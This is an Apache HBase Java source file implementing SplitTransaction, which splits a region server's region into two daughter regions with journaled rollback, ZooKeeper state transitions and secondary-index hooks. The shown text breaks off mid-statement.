max_stars_count
int64
301
224k
text
stringlengths
6
1.05M
token_count
int64
3
727k
407
<gh_stars>100-1000 /** * Copyright 2010 The Apache Software Foundation * * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.hadoop.hbase.regionserver; import java.io.IOException; import java.util.ArrayList; import java.util.List; import java.util.ListIterator; import java.util.concurrent.Callable; import java.util.concurrent.ExecutionException; import java.util.concurrent.Executors; import java.util.concurrent.Future; import java.util.concurrent.ThreadFactory; import java.util.concurrent.ThreadPoolExecutor; import java.util.concurrent.TimeUnit; import org.apache.commons.logging.Log; import org.apache.commons.logging.LogFactory; import org.apache.hadoop.conf.Configuration; import org.apache.hadoop.fs.FileStatus; import org.apache.hadoop.fs.FileSystem; import org.apache.hadoop.fs.Path; import org.apache.hadoop.hbase.HConstants; import org.apache.hadoop.hbase.HBaseFileSystem; import org.apache.hadoop.hbase.HRegionInfo; import org.apache.hadoop.hbase.NotAllMetaRegionsOnlineException; import org.apache.hadoop.hbase.Server; import org.apache.hadoop.hbase.ServerName; import org.apache.hadoop.hbase.catalog.CatalogTracker; import org.apache.hadoop.hbase.catalog.MetaEditor; import org.apache.hadoop.hbase.client.HTable; import org.apache.hadoop.hbase.client.Put; import org.apache.hadoop.hbase.executor.EventHandler.EventType; import org.apache.hadoop.hbase.executor.RegionTransitionData; import org.apache.hadoop.hbase.io.Reference.Range; import org.apache.hadoop.hbase.util.Bytes; import org.apache.hadoop.hbase.util.CancelableProgressable; import org.apache.hadoop.hbase.util.EnvironmentEdgeManager; import org.apache.hadoop.hbase.util.FSUtils; import org.apache.hadoop.hbase.util.HasThread; import org.apache.hadoop.hbase.util.PairOfSameType; import org.apache.hadoop.hbase.util.Writables; import org.apache.hadoop.hbase.zookeeper.ZKAssign; import org.apache.hadoop.hbase.zookeeper.ZKUtil; import org.apache.hadoop.hbase.zookeeper.ZooKeeperWatcher; import org.apache.zookeeper.KeeperException; import org.apache.zookeeper.KeeperException.NodeExistsException; import com.google.common.util.concurrent.ThreadFactoryBuilder; /** * Executes region split as a "transaction". Call {@link #prepare()} to setup * the transaction, {@link #execute(Server, RegionServerServices)} to run the * transaction and {@link #rollback(Server, RegionServerServices)} to cleanup if execute fails. * * <p>Here is an example of how you would use this class: * <pre> * SplitTransaction st = new SplitTransaction(this.conf, parent, midKey) * if (!st.prepare()) return; * try { * st.execute(server, services); * } catch (IOException ioe) { * try { * st.rollback(server, services); * return; * } catch (RuntimeException e) { * myAbortable.abort("Failed split, abort"); * } * } * </Pre> * <p>This class is not thread safe. Caller needs ensure split is run by * one thread only. */ public class SplitTransaction { private static final Log LOG = LogFactory.getLog(SplitTransaction.class); private static final String SPLITDIR = ".splits"; /* * Region to split */ private final HRegion parent; private HRegionInfo hri_a; private HRegionInfo hri_b; private Path splitdir; private long fileSplitTimeout = 30000; private int znodeVersion = -1; /* * Row to split around */ private final byte [] splitrow; /** * Types to add to the transaction journal. * Each enum is a step in the split transaction. Used to figure how much * we need to rollback. */ enum JournalEntry { /** * Set region as in transition, set it into SPLITTING state. */ SET_SPLITTING_IN_ZK, /** * We created the temporary split data directory. */ CREATE_SPLIT_DIR, /** * Closed the parent region. */ CLOSED_PARENT_REGION, /** * The parent has been taken out of the server's online regions list. */ OFFLINED_PARENT, /** * Started in on creation of the first daughter region. */ STARTED_REGION_A_CREATION, /** * Started in on the creation of the second daughter region. */ STARTED_REGION_B_CREATION, /** * Point of no return. * If we got here, then transaction is not recoverable other than by * crashing out the regionserver. */ PONR } /* * Journal of how far the split transaction has progressed. */ private final List<JournalEntry> journal = new ArrayList<JournalEntry>(); static final String INDEX_TABLE_SUFFIX = "_idx"; /** * Constructor * @param r Region to split * @param splitrow Row to split around */ public SplitTransaction(final HRegion r, final byte [] splitrow) { this.parent = r; this.splitrow = splitrow; this.splitdir = getSplitDir(this.parent); } /** * Does checks on split inputs. * @return <code>true</code> if the region is splittable else * <code>false</code> if it is not (e.g. its already closed, etc.). */ public boolean prepare() { if (!this.parent.isSplittable()) return false; // Split key can be null if this region is unsplittable; i.e. has refs. if (this.splitrow == null) return false; HRegionInfo hri = this.parent.getRegionInfo(); parent.prepareToSplit(); // Check splitrow. byte [] startKey = hri.getStartKey(); byte [] endKey = hri.getEndKey(); if (Bytes.equals(startKey, splitrow) || !this.parent.getRegionInfo().containsRow(splitrow)) { LOG.info("Split row is not inside region key range or is equal to " + "startkey: " + Bytes.toStringBinary(this.splitrow)); return false; } long rid = getDaughterRegionIdTimestamp(hri); this.hri_a = new HRegionInfo(hri.getTableName(), startKey, this.splitrow, false, rid); this.hri_b = new HRegionInfo(hri.getTableName(), this.splitrow, endKey, false, rid); return true; } /** * Calculate daughter regionid to use. * @param hri Parent {@link HRegionInfo} * @return Daughter region id (timestamp) to use. */ private static long getDaughterRegionIdTimestamp(final HRegionInfo hri) { long rid = EnvironmentEdgeManager.currentTimeMillis(); // Regionid is timestamp. Can't be less than that of parent else will insert // at wrong location in .META. (See HBASE-710). if (rid < hri.getRegionId()) { LOG.warn("Clock skew; parent regions id is " + hri.getRegionId() + " but current time here is " + rid); rid = hri.getRegionId() + 1; } return rid; } private static IOException closedByOtherException = new IOException( "Failed to close region: already closed by another thread"); /** * Prepare the regions and region files. * @param server Hosting server instance. Can be null when testing (won't try * and update in zk if a null server) * @param services Used to online/offline regions. * @throws IOException If thrown, transaction failed. Call {@link #rollback(Server, RegionServerServices)} * @return Regions created */ /* package */PairOfSameType<HRegion> createDaughters(final Server server, final RegionServerServices services) throws IOException { LOG.info("Starting split of region " + this.parent); boolean secondaryIndex = server == null ? false : server.getConfiguration().getBoolean("hbase.use.secondary.index", false); boolean indexRegionAvailable = false; if ((server != null && server.isStopped()) || (services != null && services.isStopping())) { throw new IOException("Server is stopped or stopping"); } assert !this.parent.lock.writeLock().isHeldByCurrentThread(): "Unsafe to hold write lock while performing RPCs"; // Coprocessor callback if (this.parent.getCoprocessorHost() != null) { this.parent.getCoprocessorHost().preSplit(); } boolean testing = server == null? true: server.getConfiguration().getBoolean("hbase.testing.nocluster", false); PairOfSameType<HRegion> daughterRegionsPair = stepsBeforeAddingPONR(server, services, testing); SplitInfo info = null; // Coprocessor callback if (secondaryIndex) { if (this.parent.getCoprocessorHost() != null) { info = this.parent.getCoprocessorHost().preSplitBeforePONR(this.splitrow); if (info == null) { throw new IOException("Pre split of Index region has failed."); } if ((info.getSplitTransaction() != null && info.getDaughters() != null)) { indexRegionAvailable = true; } } } // add one hook // do the step till started_region_b_creation // This is the point of no return. Adding subsequent edits to .META. as we // do below when we do the daughter opens adding each to .META. can fail in // various interesting ways the most interesting of which is a timeout // BUT the edits all go through (See HBASE-3872). IF we reach the PONR // then subsequent failures need to crash out this regionserver; the // server shutdown processing should be able to fix-up the incomplete split. // The offlined parent will have the daughters as extra columns. If // we leave the daughter regions in place and do not remove them when we // crash out, then they will have their references to the parent in place // still and the server shutdown fixup of .META. will point to these // regions. // We should add PONR JournalEntry before offlineParentInMeta,so even if // OfflineParentInMeta timeout,this will cause regionserver exit,and then // master ServerShutdownHandler will fix daughter & avoid data loss. (See // HBase-4562). this.journal.add(JournalEntry.PONR); // Edit parent in meta. Offlines parent region and adds splita and splitb. if (!testing) { if (!indexRegionAvailable) { MetaEditor.offlineParentInMeta(server.getCatalogTracker(), this.parent.getRegionInfo(), daughterRegionsPair.getFirst().getRegionInfo(), daughterRegionsPair.getSecond() .getRegionInfo()); } else { offlineParentInMetaBothIndexAndMainRegion(server.getCatalogTracker(), this.parent.getRegionInfo(), daughterRegionsPair.getFirst().getRegionInfo(), daughterRegionsPair.getSecond().getRegionInfo(), info.getSplitTransaction().parent.getRegionInfo(), info.getDaughters().getFirst() .getRegionInfo(), info.getDaughters().getSecond().getRegionInfo()); } } return daughterRegionsPair; } private static void offlineParentInMetaBothIndexAndMainRegion(CatalogTracker catalogTracker, HRegionInfo parent, final HRegionInfo a, final HRegionInfo b, final HRegionInfo parentIdx, final HRegionInfo idxa, final HRegionInfo idxb) throws NotAllMetaRegionsOnlineException, IOException { HRegionInfo copyOfParent = new HRegionInfo(parent); copyOfParent.setOffline(true); copyOfParent.setSplit(true); List<Put> list = new ArrayList<Put>(); Put put = new Put(copyOfParent.getRegionName()); put.add(HConstants.CATALOG_FAMILY, HConstants.REGIONINFO_QUALIFIER, Writables.getBytes(copyOfParent)); put.add(HConstants.CATALOG_FAMILY, HConstants.SPLITA_QUALIFIER, Writables.getBytes(a)); put.add(HConstants.CATALOG_FAMILY, HConstants.SPLITB_QUALIFIER, Writables.getBytes(b)); list.add(put); HRegionInfo copyOfIdxParent = new HRegionInfo(parentIdx); copyOfIdxParent.setOffline(true); copyOfIdxParent.setSplit(true); Put putForIdxRegion = new Put(copyOfIdxParent.getRegionName()); putForIdxRegion.add(HConstants.CATALOG_FAMILY, HConstants.REGIONINFO_QUALIFIER, Writables.getBytes(copyOfIdxParent)); putForIdxRegion.add(HConstants.CATALOG_FAMILY, HConstants.SPLITA_QUALIFIER, Writables.getBytes(idxa)); putForIdxRegion.add(HConstants.CATALOG_FAMILY, HConstants.SPLITB_QUALIFIER, Writables.getBytes(idxb)); list.add(putForIdxRegion); putToMetaTable(catalogTracker, list); LOG.info("Offlined parent region " + parent.getRegionNameAsString() + " in META"); } private static void putToMetaTable(final CatalogTracker ct, final List<Put> p) throws IOException { org.apache.hadoop.hbase.client.HConnection c = ct.getConnection(); if (c == null) throw new NullPointerException("No connection"); put(new HTable(ct.getConnection().getConfiguration(), HConstants.META_TABLE_NAME), p); } private static void put(final HTable t, final List<Put> p) throws IOException { try { t.put(p); } finally { t.close(); } } public PairOfSameType<HRegion> stepsBeforeAddingPONR(final Server server, final RegionServerServices services, boolean testing) throws IOException { // Set ephemeral SPLITTING znode up in zk. Mocked servers sometimes don't // have zookeeper so don't do zk stuff if server or zookeeper is null if (server != null && server.getZooKeeper() != null) { try { createNodeSplitting(server.getZooKeeper(), this.parent.getRegionInfo(), server.getServerName()); } catch (KeeperException e) { throw new IOException("Failed creating SPLITTING znode on " + this.parent.getRegionNameAsString(), e); } } this.journal.add(JournalEntry.SET_SPLITTING_IN_ZK); if (server != null && server.getZooKeeper() != null) { try { // Transition node from SPLITTING to SPLITTING after creating the split node. // Master will get the callback for node change only if the transition is successful. // Note that if the transition fails then the rollback will delete the created znode // TODO : May be we can add some new state to znode and handle the new state incase of success/failure this.znodeVersion = transitionNodeSplitting(server.getZooKeeper(), this.parent.getRegionInfo(), server.getServerName(), -1); } catch (KeeperException e) { throw new IOException("Failed setting SPLITTING znode on " + this.parent.getRegionNameAsString(), e); } } createSplitDir(this.parent.getFilesystem(), this.splitdir); this.journal.add(JournalEntry.CREATE_SPLIT_DIR); List<StoreFile> hstoreFilesToSplit = null; Exception exceptionToThrow = null; try{ hstoreFilesToSplit = this.parent.close(false); } catch (Exception e) { exceptionToThrow = e; } if (exceptionToThrow == null && hstoreFilesToSplit == null) { // The region was closed by a concurrent thread. We can't continue // with the split, instead we must just abandon the split. If we // reopen or split this could cause problems because the region has // probably already been moved to a different server, or is in the // process of moving to a different server. exceptionToThrow = closedByOtherException; } if (exceptionToThrow != closedByOtherException) { this.journal.add(JournalEntry.CLOSED_PARENT_REGION); } if (exceptionToThrow != null) { if (exceptionToThrow instanceof IOException) throw (IOException)exceptionToThrow; throw new IOException(exceptionToThrow); } if (!testing) { services.removeFromOnlineRegions(this.parent.getRegionInfo().getEncodedName()); } this.journal.add(JournalEntry.OFFLINED_PARENT); // TODO: If splitStoreFiles were multithreaded would we complete steps in // less elapsed time? St.Ack 20100920 // // splitStoreFiles creates daughter region dirs under the parent splits dir // Nothing to unroll here if failure -- clean up of CREATE_SPLIT_DIR will // clean this up. splitStoreFiles(this.splitdir, hstoreFilesToSplit); // Log to the journal that we are creating region A, the first daughter // region. We could fail halfway through. If we do, we could have left // stuff in fs that needs cleanup -- a storefile or two. Thats why we // add entry to journal BEFORE rather than AFTER the change. this.journal.add(JournalEntry.STARTED_REGION_A_CREATION); HRegion a = createDaughterRegion(this.hri_a, this.parent.rsServices); // Ditto this.journal.add(JournalEntry.STARTED_REGION_B_CREATION); HRegion b = createDaughterRegion(this.hri_b, this.parent.rsServices); return new PairOfSameType<HRegion>(a,b); } /** * Perform time consuming opening of the daughter regions. * @param server Hosting server instance. Can be null when testing (won't try * and update in zk if a null server) * @param services Used to online/offline regions. * @param a first daughter region * @param a second daughter region * @throws IOException If thrown, transaction failed. Call {@link #rollback(Server, RegionServerServices)} */ /* package */void openDaughters(final Server server, final RegionServerServices services, HRegion a, HRegion b) throws IOException { boolean stopped = server != null && server.isStopped(); boolean stopping = services != null && services.isStopping(); // TODO: Is this check needed here? if (stopped || stopping) { LOG.info("Not opening daughters " + b.getRegionInfo().getRegionNameAsString() + " and " + a.getRegionInfo().getRegionNameAsString() + " because stopping=" + stopping + ", stopped=" + stopped); } else { // Open daughters in parallel. DaughterOpener aOpener = new DaughterOpener(server, a); DaughterOpener bOpener = new DaughterOpener(server, b); aOpener.start(); bOpener.start(); try { aOpener.join(); bOpener.join(); } catch (InterruptedException e) { Thread.currentThread().interrupt(); throw new IOException("Interrupted " + e.getMessage()); } if (aOpener.getException() != null) { throw new IOException("Failed " + aOpener.getName(), aOpener.getException()); } if (bOpener.getException() != null) { throw new IOException("Failed " + bOpener.getName(), bOpener.getException()); } if (services != null) { try { // add 2nd daughter first (see HBASE-4335) services.postOpenDeployTasks(b, server.getCatalogTracker(), true); // Should add it to OnlineRegions services.addToOnlineRegions(b); services.postOpenDeployTasks(a, server.getCatalogTracker(), true); services.addToOnlineRegions(a); } catch (KeeperException ke) { throw new IOException(ke); } } } } /** * Finish off split transaction, transition the zknode * @param server Hosting server instance. Can be null when testing (won't try * and update in zk if a null server) * @param services Used to online/offline regions. * @param a first daughter region * @param a second daughter region * @throws IOException If thrown, transaction failed. Call {@link #rollback(Server, RegionServerServices)} */ /* package */void transitionZKNode(final Server server, final RegionServerServices services, HRegion a, HRegion b) throws IOException { // Tell master about split by updating zk. If we fail, abort. if (server != null && server.getZooKeeper() != null) { try { this.znodeVersion = transitionNodeSplit(server.getZooKeeper(), parent.getRegionInfo(), a.getRegionInfo(), b.getRegionInfo(), server.getServerName(), this.znodeVersion); int spins = 0; // Now wait for the master to process the split. We know it's done // when the znode is deleted. The reason we keep tickling the znode is // that it's possible for the master to miss an event. do { if (spins % 10 == 0) { LOG.debug("Still waiting on the master to process the split for " + this.parent.getRegionInfo().getEncodedName()); } Thread.sleep(100); // When this returns -1 it means the znode doesn't exist this.znodeVersion = tickleNodeSplit(server.getZooKeeper(), parent.getRegionInfo(), a.getRegionInfo(), b.getRegionInfo(), server.getServerName(), this.znodeVersion); spins++; } while (this.znodeVersion != -1 && !server.isStopped() && !services.isStopping()); } catch (Exception e) { if (e instanceof InterruptedException) { Thread.currentThread().interrupt(); } throw new IOException("Failed telling master about split", e); } } // Coprocessor callback if (this.parent.getCoprocessorHost() != null) { this.parent.getCoprocessorHost().postSplit(a,b); } // Leaving here, the splitdir with its dross will be in place but since the // split was successful, just leave it; it'll be cleaned when parent is // deleted and cleaned up. } /** * Run the transaction. * @param server Hosting server instance. Can be null when testing (won't try * and update in zk if a null server) * @param services Used to online/offline regions. * @throws IOException If thrown, transaction failed. Call {@link #rollback(Server, RegionServerServices)} * @return Regions created * @throws IOException * @see #rollback(Server, RegionServerServices) */ public PairOfSameType<HRegion> execute(final Server server, final RegionServerServices services) throws IOException { PairOfSameType<HRegion> regions = createDaughters(server, services); if (this.parent.getCoprocessorHost() != null) { this.parent.getCoprocessorHost().preSplitAfterPONR(); } stepsAfterPONR(server, services, regions); return regions; } public void stepsAfterPONR(final Server server, final RegionServerServices services, PairOfSameType<HRegion> regions) throws IOException { openDaughters(server, services, regions.getFirst(), regions.getSecond()); transitionZKNode(server, services, regions.getFirst(), regions.getSecond()); } /* * Open daughter region in its own thread. * If we fail, abort this hosting server. */ class DaughterOpener extends HasThread { private final Server server; private final HRegion r; private Throwable t = null; DaughterOpener(final Server s, final HRegion r) { super((s == null? "null-services": s.getServerName()) + "-daughterOpener=" + r.getRegionInfo().getEncodedName()); setDaemon(true); this.server = s; this.r = r; } /** * @return Null if open succeeded else exception that causes us fail open. * Call it after this thread exits else you may get wrong view on result. */ Throwable getException() { return this.t; } @Override public void run() { try { openDaughterRegion(this.server, r); } catch (Throwable t) { this.t = t; } } } /** * Open daughter regions, add them to online list and update meta. * @param server * @param services Can be null when testing. * @param daughter * @throws IOException * @throws KeeperException */ void openDaughterRegion(final Server server, final HRegion daughter) throws IOException, KeeperException { HRegionInfo hri = daughter.getRegionInfo(); LoggingProgressable reporter = server == null? null: new LoggingProgressable(hri, server.getConfiguration()); daughter.openHRegion(reporter); } static class LoggingProgressable implements CancelableProgressable { private final HRegionInfo hri; private long lastLog = -1; private final long interval; LoggingProgressable(final HRegionInfo hri, final Configuration c) { this.hri = hri; this.interval = c.getLong("hbase.regionserver.split.daughter.open.log.interval", 10000); } @Override public boolean progress() { long now = System.currentTimeMillis(); if (now - lastLog > this.interval) { LOG.info("Opening " + this.hri.getRegionNameAsString()); this.lastLog = now; } return true; } } private static Path getSplitDir(final HRegion r) { return new Path(r.getRegionDir(), SPLITDIR); } /** * @param fs Filesystem to use * @param splitdir Directory to store temporary split data in * @throws IOException If <code>splitdir</code> already exists or we fail * to create it. * @see #cleanupSplitDir(FileSystem, Path) */ void createSplitDir(final FileSystem fs, final Path splitdir) throws IOException { if (fs.exists(splitdir)) { LOG.info("The " + splitdir + " directory exists. Hence deleting it to recreate it"); if (!HBaseFileSystem.deleteDirFromFileSystem(fs, splitdir)) { throw new IOException("Failed deletion of " + splitdir + " before creating them again."); } } if (!HBaseFileSystem.makeDirOnFileSystem(fs, splitdir)) throw new IOException("Failed create of " + splitdir); } private static void cleanupSplitDir(final FileSystem fs, final Path splitdir) throws IOException { // Splitdir may have been cleaned up by reopen of the parent dir. deleteDir(fs, splitdir, false); } /** * @param fs Filesystem to use * @param dir Directory to delete * @param mustPreExist If true, we'll throw exception if <code>dir</code> * does not preexist, else we'll just pass. * @throws IOException Thrown if we fail to delete passed <code>dir</code> */ private static void deleteDir(final FileSystem fs, final Path dir, final boolean mustPreExist) throws IOException { if (!fs.exists(dir)) { if (mustPreExist) throw new IOException(dir.toString() + " does not exist!"); } else if (!HBaseFileSystem.deleteDirFromFileSystem(fs, dir)) { throw new IOException("Failed delete of " + dir); } } protected void splitStoreFiles(final Path splitdir, final List<StoreFile> hstoreFilesToSplit) throws IOException { if (hstoreFilesToSplit == null) { // Could be null because close didn't succeed -- for now consider it fatal throw new IOException("Close returned empty list of StoreFiles"); } // The following code sets up a thread pool executor with as many slots as // there's files to split. It then fires up everything, waits for // completion and finally checks for any exception int nbFiles = hstoreFilesToSplit.size(); boolean secondaryIndex = this.parent.getConf().getBoolean("hbase.use.secondary.index", false); if (secondaryIndex) { String idxTableName = this.parent.getTableDesc().getNameAsString(); if (isIndexTable(idxTableName)) if (nbFiles == 0) { LOG.debug("Setting number of threads for ThreadPoolExecutor to 1 since IndexTable " + idxTableName + " doesn't have any store files "); nbFiles = 1; } } ThreadFactoryBuilder builder = new ThreadFactoryBuilder(); builder.setNameFormat("StoreFileSplitter-%1$d"); ThreadFactory factory = builder.build(); ThreadPoolExecutor threadPool = (ThreadPoolExecutor) Executors.newFixedThreadPool(nbFiles, factory); List<Future<Void>> futures = new ArrayList<Future<Void>>(nbFiles); // Split each store file. for (StoreFile sf: hstoreFilesToSplit) { //splitStoreFile(sf, splitdir); StoreFileSplitter sfs = new StoreFileSplitter(sf, splitdir); futures.add(threadPool.submit(sfs)); } // Shutdown the pool threadPool.shutdown(); // Wait for all the tasks to finish try { boolean stillRunning = !threadPool.awaitTermination( this.fileSplitTimeout, TimeUnit.MILLISECONDS); if (stillRunning) { threadPool.shutdownNow(); // wait for the thread to shutdown completely. while (!threadPool.isTerminated()) { Thread.sleep(50); } throw new IOException("Took too long to split the" + " files and create the references, aborting split"); } } catch (InterruptedException e) { Thread.currentThread().interrupt(); throw new IOException("Interrupted while waiting for file splitters", e); } // Look for any exception for (Future<Void> future: futures) { try { future.get(); } catch (InterruptedException e) { Thread.currentThread().interrupt(); throw new IOException( "Interrupted while trying to get the results of file splitters", e); } catch (ExecutionException e) { throw new IOException(e); } } } private boolean isIndexTable(String idxTableName) { return idxTableName.endsWith(INDEX_TABLE_SUFFIX); } private void splitStoreFile(final StoreFile sf, final Path splitdir) throws IOException { FileSystem fs = this.parent.getFilesystem(); byte [] family = sf.getFamily(); String encoded = this.hri_a.getEncodedName(); Path storedir = Store.getStoreHomedir(splitdir, encoded, family); StoreFile.split(fs, storedir, sf, this.splitrow, Range.bottom); encoded = this.hri_b.getEncodedName(); storedir = Store.getStoreHomedir(splitdir, encoded, family); StoreFile.split(fs, storedir, sf, this.splitrow, Range.top); } /** * Utility class used to do the file splitting / reference writing * in parallel instead of sequentially. */ class StoreFileSplitter implements Callable<Void> { private final StoreFile sf; private final Path splitdir; /** * Constructor that takes what it needs to split * @param sf which file * @param splitdir where the splitting is done */ public StoreFileSplitter(final StoreFile sf, final Path splitdir) { this.sf = sf; this.splitdir = splitdir; } public Void call() throws IOException { splitStoreFile(sf, splitdir); return null; } } /** * @param hri Spec. for daughter region to open. * @param flusher Flusher this region should use. * @return Created daughter HRegion. * @throws IOException * @see #cleanupDaughterRegion(FileSystem, Path, HRegionInfo) */ HRegion createDaughterRegion(final HRegionInfo hri, final RegionServerServices rsServices) throws IOException { // Package private so unit tests have access. FileSystem fs = this.parent.getFilesystem(); Path regionDir = getSplitDirForDaughter(this.parent.getFilesystem(), this.splitdir, hri); HRegion r = HRegion.newHRegion(this.parent.getTableDir(), this.parent.getLog(), fs, this.parent.getBaseConf(), hri, this.parent.getTableDesc(), rsServices); long halfParentReadRequestCount = this.parent.getReadRequestsCount() / 2; r.readRequestsCount.set(halfParentReadRequestCount); r.setOpMetricsReadRequestCount(halfParentReadRequestCount); long halfParentWriteRequest = this.parent.getWriteRequestsCount() / 2; r.writeRequestsCount.set(halfParentWriteRequest); r.setOpMetricsWriteRequestCount(halfParentWriteRequest); HRegion.moveInitialFilesIntoPlace(fs, regionDir, r.getRegionDir()); return r; } private static void cleanupDaughterRegion(final FileSystem fs, final Path tabledir, final String encodedName) throws IOException { Path regiondir = HRegion.getRegionDir(tabledir, encodedName); // Dir may not preexist. deleteDir(fs, regiondir, false); } /* * Get the daughter directories in the splits dir. The splits dir is under * the parent regions' directory. * @param fs * @param splitdir * @param hri * @return Path to daughter split dir. * @throws IOException */ private static Path getSplitDirForDaughter(final FileSystem fs, final Path splitdir, final HRegionInfo hri) throws IOException { return new Path(splitdir, hri.getEncodedName()); } /** * @param server Hosting server instance (May be null when testing). * @param services * @throws IOException If thrown, rollback failed. Take drastic action. * @return True if we successfully rolled back, false if we got to the point * of no return and so now need to abort the server to minimize damage. */ public boolean rollback(final Server server, final RegionServerServices services) throws IOException { // Coprocessor callback boolean secondaryIndex = server == null ? false : server.getConfiguration().getBoolean("hbase.use.secondary.index", false); if (secondaryIndex) { if (this.parent.getCoprocessorHost() != null) { this.parent.getCoprocessorHost().preRollBack(); } } boolean result = true; FileSystem fs = this.parent.getFilesystem(); ListIterator<JournalEntry> iterator = this.journal.listIterator(this.journal.size()); // Iterate in reverse. while (iterator.hasPrevious()) { JournalEntry je = iterator.previous(); switch(je) { case SET_SPLITTING_IN_ZK: if (server != null && server.getZooKeeper() != null) { cleanZK(server, this.parent.getRegionInfo()); } break; case CREATE_SPLIT_DIR: this.parent.writestate.writesEnabled = true; cleanupSplitDir(fs, this.splitdir); break; case CLOSED_PARENT_REGION: try { // So, this returns a seqid but if we just closed and then reopened, we // should be ok. On close, we flushed using sequenceid obtained from // hosting regionserver so no need to propagate the sequenceid returned // out of initialize below up into regionserver as we normally do. // TODO: Verify. this.parent.initialize(); } catch (IOException e) { LOG.error("Failed rollbacking CLOSED_PARENT_REGION of region " + this.parent.getRegionNameAsString(), e); throw new RuntimeException(e); } break; case STARTED_REGION_A_CREATION: cleanupDaughterRegion(fs, this.parent.getTableDir(), this.hri_a.getEncodedName()); break; case STARTED_REGION_B_CREATION: cleanupDaughterRegion(fs, this.parent.getTableDir(), this.hri_b.getEncodedName()); break; case OFFLINED_PARENT: if (services != null) services.addToOnlineRegions(this.parent); break; case PONR: // We got to the point-of-no-return so we need to just abort. Return // immediately. Do not clean up created daughter regions. They need // to be in place so we don't delete the parent region mistakenly. // See HBASE-3872. return false; default: throw new RuntimeException("Unhandled journal entry: " + je); } } return result; } HRegionInfo getFirstDaughter() { return hri_a; } HRegionInfo getSecondDaughter() { return hri_b; } // For unit testing. Path getSplitDir() { return this.splitdir; } /** * Clean up any split detritus that may have been left around from previous * split attempts. * Call this method on initial region deploy. Cleans up any mess * left by previous deploys of passed <code>r</code> region. * @param r * @throws IOException */ static void cleanupAnySplitDetritus(final HRegion r) throws IOException { Path splitdir = getSplitDir(r); FileSystem fs = r.getFilesystem(); if (!fs.exists(splitdir)) return; // Look at the splitdir. It could have the encoded names of the daughter // regions we tried to make. See if the daughter regions actually got made // out under the tabledir. If here under splitdir still, then the split did // not complete. Try and do cleanup. This code WILL NOT catch the case // where we successfully created daughter a but regionserver crashed during // the creation of region b. In this case, there'll be an orphan daughter // dir in the filesystem. TOOD: Fix. FileStatus [] daughters = fs.listStatus(splitdir, new FSUtils.DirFilter(fs)); for (int i = 0; i < daughters.length; i++) { cleanupDaughterRegion(fs, r.getTableDir(), daughters[i].getPath().getName()); } cleanupSplitDir(r.getFilesystem(), splitdir); LOG.info("Cleaned up old failed split transaction detritus: " + splitdir); } private static void cleanZK(final Server server, final HRegionInfo hri) { try { // Only delete if its in expected state; could have been hijacked. ZKAssign.deleteNode(server.getZooKeeper(), hri.getEncodedName(), EventType.RS_ZK_REGION_SPLITTING); } catch (KeeperException e) { server.abort("Failed cleanup of " + hri.getRegionNameAsString(), e); } } /** * Creates a new ephemeral node in the SPLITTING state for the specified region. * Create it ephemeral in case regionserver dies mid-split. * * <p>Does not transition nodes from other states. If a node already exists * for this region, a {@link NodeExistsException} will be thrown. * * @param zkw zk reference * @param region region to be created as offline * @param serverName server event originates from * @return Version of znode created. * @throws KeeperException * @throws IOException */ void createNodeSplitting(final ZooKeeperWatcher zkw, final HRegionInfo region, final ServerName serverName) throws KeeperException, IOException { LOG.debug(zkw.prefix("Creating ephemeral node for " + region.getEncodedName() + " in SPLITTING state")); RegionTransitionData data = new RegionTransitionData(EventType.RS_ZK_REGION_SPLITTING, region.getRegionName(), serverName); String node = ZKAssign.getNodeName(zkw, region.getEncodedName()); if (!ZKUtil.createEphemeralNodeAndWatch(zkw, node, data.getBytes())) { throw new IOException("Failed create of ephemeral " + node); } } /** * Transitions an existing node for the specified region which is * currently in the SPLITTING state to be in the SPLIT state. Converts the * ephemeral SPLITTING znode to an ephemeral SPLIT node. Master cleans up * SPLIT znode when it reads it (or if we crash, zk will clean it up). * * <p>Does not transition nodes from other states. If for some reason the * node could not be transitioned, the method returns -1. If the transition * is successful, the version of the node after transition is returned. * * <p>This method can fail and return false for three different reasons: * <ul><li>Node for this region does not exist</li> * <li>Node for this region is not in SPLITTING state</li> * <li>After verifying SPLITTING state, update fails because of wrong version * (this should never actually happen since an RS only does this transition * following a transition to SPLITTING. if two RS are conflicting, one would * fail the original transition to SPLITTING and not this transition)</li> * </ul> * * <p>Does not set any watches. * * <p>This method should only be used by a RegionServer when completing the * open of a region. * * @param zkw zk reference * @param parent region to be transitioned to opened * @param a Daughter a of split * @param b Daughter b of split * @param serverName server event originates from * @return version of node after transition, -1 if unsuccessful transition * @throws KeeperException if unexpected zookeeper exception * @throws IOException */ private static int transitionNodeSplit(ZooKeeperWatcher zkw, HRegionInfo parent, HRegionInfo a, HRegionInfo b, ServerName serverName, final int znodeVersion) throws KeeperException, IOException { byte [] payload = Writables.getBytes(a, b); return ZKAssign.transitionNode(zkw, parent, serverName, EventType.RS_ZK_REGION_SPLITTING, EventType.RS_ZK_REGION_SPLIT, znodeVersion, payload); } public static class SplitInfo { PairOfSameType<HRegion> pairOfSameType; SplitTransaction st; public void setDaughtersAndTransaction(PairOfSameType<HRegion> pairOfSameType, SplitTransaction st) { this.pairOfSameType = pairOfSameType; this.st = st; } public PairOfSameType<HRegion> getDaughters() { return this.pairOfSameType; } public SplitTransaction getSplitTransaction() { return this.st; } } /** * Added for secondary index. Needed in the hooks to get the parentRegion name * @return */ public HRegion getParent() { return this.parent; } /** * * @param zkw zk reference * @param parent region to be transitioned to splitting * @param serverName server event originates from * @param version znode version * @return version of node after transition, -1 if unsuccessful transition * @throws KeeperException * @throws IOException */ int transitionNodeSplitting(final ZooKeeperWatcher zkw, final HRegionInfo parent, final ServerName serverName, final int version) throws KeeperException, IOException { return ZKAssign.transitionNode(zkw, parent, serverName, EventType.RS_ZK_REGION_SPLITTING, EventType.RS_ZK_REGION_SPLITTING, version); } private static int tickleNodeSplit(ZooKeeperWatcher zkw, HRegionInfo parent, HRegionInfo a, HRegionInfo b, ServerName serverName, final int znodeVersion) throws KeeperException, IOException { byte [] payload = Writables.getBytes(a, b); return ZKAssign.transitionNode(zkw, parent, serverName, EventType.RS_ZK_REGION_SPLIT, 